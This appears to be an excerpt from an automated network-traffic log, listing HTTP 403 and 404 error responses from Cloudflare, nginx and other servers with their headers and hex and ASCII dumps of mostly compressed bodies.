                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 11 Jan 2025 08:38:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BgAp4OZBr9WUTAx15luT7q1YLAAyI%2FwJJD7iK7jdfJrpXgPMzm%2FHkmRuffp4pw4eNlR0fIursOBn22YEY1TVLQi2DTIsw1HYs7NRtbk28sD2ZiP2l7%2F7JcAuUgGujYLEatIyJCvEfw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 900397151dde4285-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1608&min_rtt=1608&rtt_var=804&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=714&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 45 97 43 36 a2 e0 c2 95 27 48 9c b1 09 a4 93 32 66 61 6f 2f 55 0b e2 da a5 ab 07 ef e7 e3 61 ac 43 76 6d 83 91 3d 39 ac a9 66 76 db f5 06 0e 45 43 22 62 41 fb 32 d1 3e 2b 6d 83 a1 d0 34 eb 85 a5 b2 3a 8c dd f7 22 76 0e ed 3b 9e d9 ea 96 b2 f4 49 ee 9f 99 5d 68 76 79 b2 32 06 3c 8c 9e 28 49 0f b5 00 a5 9b 0f 99 e1 74 3e ee c1 0b c1 2e 6a 19 18 ae 9a 58 28 4f c0 aa 45 61 f4 3d 83 31 7f c4 af 11 0f 5b 30 e7 0b 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a6M0a<@EC6'H2fao/UaCvm=9fvEC"bA2>+m4:"v;I]hvy2<(It>.jX(OEa=1[0$0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 11 Jan 2025 08:38:24 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oOlK6JPWivihzn1jbufvQePljqU0bfXC5wTFyAPQctq%2FhwYlx0EFFvji1%2BZHjGofLNz7QaF%2FRL6D6X5A6NuL5L%2BsYO9rDvtsG7WVpZTnw3xPwEK5rB6YUcBVs67riC3Ha1kiNBS2Sw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9003972518b70c88-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1604&min_rtt=1604&rtt_var=802&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=734&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 45 97 43 36 a2 e0 c2 95 27 48 9c b1 09 a4 93 32 66 61 6f 2f 55 0b e2 da a5 ab 07 ef e7 e3 61 ac 43 76 6d 83 91 3d 39 ac a9 66 76 db f5 06 0e 45 43 22 62 41 fb 32 d1 3e 2b 6d 83 a1 d0 34 eb 85 a5 b2 3a 8c dd f7 22 76 0e ed 3b 9e d9 ea 96 b2 f4 49 ee 9f 99 5d 68 76 79 b2 32 06 3c 8c 9e 28 49 0f b5 00 a5 9b 0f 99 e1 74 3e ee c1 0b c1 2e 6a 19 18 ae 9a 58 28 4f c0 aa 45 61 f4 3d 83 31 7f c4 af 11 0f 5b 30 e7 0b 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a6M0a<@EC6'H2fao/UaCvm=9fvEC"bA2>+m4:"v;I]hvy2<(It>.jX(OEa=1[0$0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 11 Jan 2025 08:38:27 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YVygnqjWPGPr9NBEGFCsdGiBT65M%2F2Nrc290OqWsEATzcVtEei0twVSkQwcuiC7q5KxGBM7Ka9pWl7jdW5cLSk7GqD7EB6CnKjZ%2FreEXOnosE0xAZHd5XknHUvHckjAhoJZKUKiMlg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 900397351e9c43b9-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2513&min_rtt=2513&rtt_var=1256&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10816&delivery_rate=0&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 45 97 43 36 a2 e0 c2 95 27 48 9c b1 09 a4 93 32 66 61 6f 2f 55 0b e2 da a5 ab 07 ef e7 e3 61 ac 43 76 6d 83 91 3d 39 ac a9 66 76 db f5 06 0e 45 43 22 62 41 fb 32 d1 3e 2b 6d 83 a1 d0 34 eb 85 a5 b2 3a 8c dd f7 22 76 0e ed 3b 9e d9 ea 96 b2 f4 49 ee 9f 99 5d 68 76 79 b2 32 06 3c 8c 9e 28 49 0f b5 00 a5 9b 0f 99 e1 74 3e ee c1 0b c1 2e 6a 19 18 ae 9a 58 28 4f c0 aa 45 61 f4 3d 83 31 7f c4 af 11 0f 5b 30 e7 0b 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a6M0a<@EC6'H2fao/UaCvm=9fvEC"bA2>+m4:"v;I]hvy2<(It>.jX(OEa=1[0$0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 11 Jan 2025 08:38:29 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4PI6f6bb8MkEFrNmwW4fj%2Bq7LIIkxnRAsHJYFg390iUJXN7HNwbgu5%2FCZWBlgFZOD5s5ce6uHy7fh68SMLKI%2FX9bTl6FAUhyPnVpHgYawPwYMih4StHzNGhZ6UxTcFhByA0Yd85dhA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90039744dc1343b1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2497&min_rtt=2497&rtt_var=1248&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=443&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chro
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:39:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CEBCD8y5KK2n%2BrsBbonTmtvVY2Paq77HTOEx8sgSfdYraiT4PVE2S6C2tc5MntIBiC9rYpbnAaoyj1JCMq0g6ougWqlvkpAf3ny6OSV5clmreWElW9vLsJozMGPBp6kI9n0hqxCIH9%2BJ"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9003991889030f78-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1636&min_rtt=1636&rtt_var=818&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=720&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f Data Ascii: 2cddT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:39:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XAXpYLOYWnpWeejz%2BJ%2BHL7N7ePGHz1fPfgWPiCFLoisn9QDeRE45bEkzK%2BRsVpVHLLmGXixjdNf8G0kqmWcKH7gFjhH392LHLKAySBRssw27rWQiKCPNSiHsHbC8bwiQ97RMqKjViKel"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 900399286feede99-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1629&min_rtt=1629&rtt_var=814&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=740&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweW
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:39:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ABNAt83oNbX1%2BxC9PZcogsWDBhlWCz32Ai61%2Fa2PGJjln2NRnnqP6zy7H2e%2BoMmV6RjaL7119DzTJo16HFtYrGck5qpFvhsS%2B9XdImzxz2xbNFUPC1yfL8qRb5y5DM5RK%2BVBGktkBs8k"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 900399384c6d8c41-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1811&min_rtt=1811&rtt_var=905&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10822&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:39:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachex-turbo-charged-by: LiteSpeedcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OuMRHg8zPOKYYiFqQ7hQbJ5gCnjfyjrz9kWB21BvEQSp5nVxuDMCsg3t0yyVamWJIJSfgx35q2kH5ofNSNZguVMQtwoBiwl45HoeLMMovV096qWKsh7z7Ss4ZQVWiee30BgfgLY991jC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 900399485b0cde93-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1578&rtt_var=789&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=445&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 34 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 Data Ascii: 4e3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica,
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: awselb/2.0Date: Sat, 11 Jan 2025 08:40:01 GMTContent-Length: 0Connection: closeWAFRule: 5
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:40:07 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ti8Udf75Eo4n743kGB%2F9QPbb758G2bmcA1Bg6XRDpwzJlTE7VD4PVTyLdQ9dDyyciKIMAgK62j%2Fuf%2BDz1aDUv6IW%2Bexwuu5sRMbBygvlnA7x%2BQTGPrGGEXh%2BoHl8Qi71aRq6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 900399a3cbaf43ee-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1705&rtt_var=852&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=702&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:40:09 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9wKd7SpC5Ihip1i8tpWZqhMXbcZ2abVLvkidWSpdL1Om5RwtkW%2BmTg%2Fb4p62K1hKRW4gnvJwmzIwjiDE6FGv1cwEcxsLxfJoDb5zCQECZzWaSyddKkL2x3LwCrHrfm1QzQYd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 900399b3b8508c0f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1993&min_rtt=1993&rtt_var=996&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=722&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 29 ea 81 c3 6a 25 68 52 b5 52 28 11 b8 07 8e 06 6f e5 4a 6d 9c d8 5b 22 fe 1e 25 15 12 d7 99 37 a3 19 ba ab 5e d7 f6 a3 ad 61 6b 5f 1a 68 0f cf cd 6e 0d 8b 7b c4 5d 6d 37 88 95 ad 6e ce 43 51 22 d6 fb 05 1b 0a 7a 39 33 05 71 9e 0d e9 49 cf c2 ab 72 05 fb a8 b0 89 d7 ce 13 de 44 43 38 43 f4 19 fd cf 94 5b f2 3f 26 2c d9 50 cf 36 08 24 19 ae 92 55 3c 1c de 1a 18 5d 86 2e 2a 1c 27 0e 62 07 1a 4e 19 b2 a4 6f 49 05 61 3f 35 25 36 e4 bc 4f 92 33 3f f5 ee 2b 08 bc cf 00 38 85 71 1c 8b 8b cb 2a 69 18 8a 3e 45 68 63 52 78 2c 09 ff 22 86 70 de 44 38 7f f9 05 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 2a 59 1a 36 06 01 00 00 0d 0a Data Ascii: d5LN0Dw)j%hRR(oJm["%7^ak_hn{]m7nCQ"z93qIrDC8C[?&,P6$U<].*'bNoIa?5%6O3?+8q*i>EhcRx,"pD8b*Y6
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:40:12 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IbpIwYfvCWaqPyEx4jFH54W8ykyO%2FKSHMVTsWG1pMWooMCEKVIPX6bPIYw%2FWwteRMGN%2FKg6gQhaZZ38Uu9p68cA5uanxe%2BDWi4NsMexLRrlA9tf3cCEelpu8oZiFuUYg7wys"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 900399c3aa008c0f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1982&rtt_var=991&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10804&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 29 ea 81 c3 6a 25 68 52 b5 52 28 11 b8 07 8e 06 6f e5 4a 6d 9c d8 5b 22 fe 1e 25 15 12 d7 99 37 a3 19 ba ab 5e d7 f6 a3 ad 61 6b 5f 1a 68 0f cf cd 6e 0d 8b 7b c4 5d 6d 37 88 95 ad 6e ce 43 51 22 d6 fb 05 1b 0a 7a 39 33 05 71 9e 0d e9 49 cf c2 ab 72 05 fb a8 b0 89 d7 ce 13 de 44 43 38 43 f4 19 fd cf 94 5b f2 3f 26 2c d9 50 cf 36 08 24 19 ae 92 55 3c 1c de 1a 18 5d 86 2e 2a 1c 27 0e 62 07 1a 4e 19 b2 a4 6f 49 05 61 3f 35 25 36 e4 bc 4f 92 33 3f f5 ee 2b 08 bc cf 00 38 85 71 1c 8b 8b cb 2a 69 18 8a 3e 45 68 63 52 78 2c 09 ff 22 86 70 de 44 38 7f f9 05 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 2a 59 1a 36 06 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: d5LN0Dw)j%hRR(oJm["%7^ak_hn{]m7nCQ"z93qIrDC8C[?&,P6$U<].*'bNoIa?5%6O3?+8q*i>EhcRx,"pD8b*Y60
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 08:40:14 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fS7W5D9RuPmSFNyO6FHSzRPFDM5X5y0K5uMzRrpGxjwA3gb82qWOuP0M6SmBXAvLGYobPvK5TuG8BVTLpan7SQqTD7xBDwmP7DiPRIq5yIINQFJFPUYgldg%2BUrKxN5O1mLPw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 900399d39bf78c0f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1881&min_rtt=1881&rtt_var=940&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=439&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 30 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 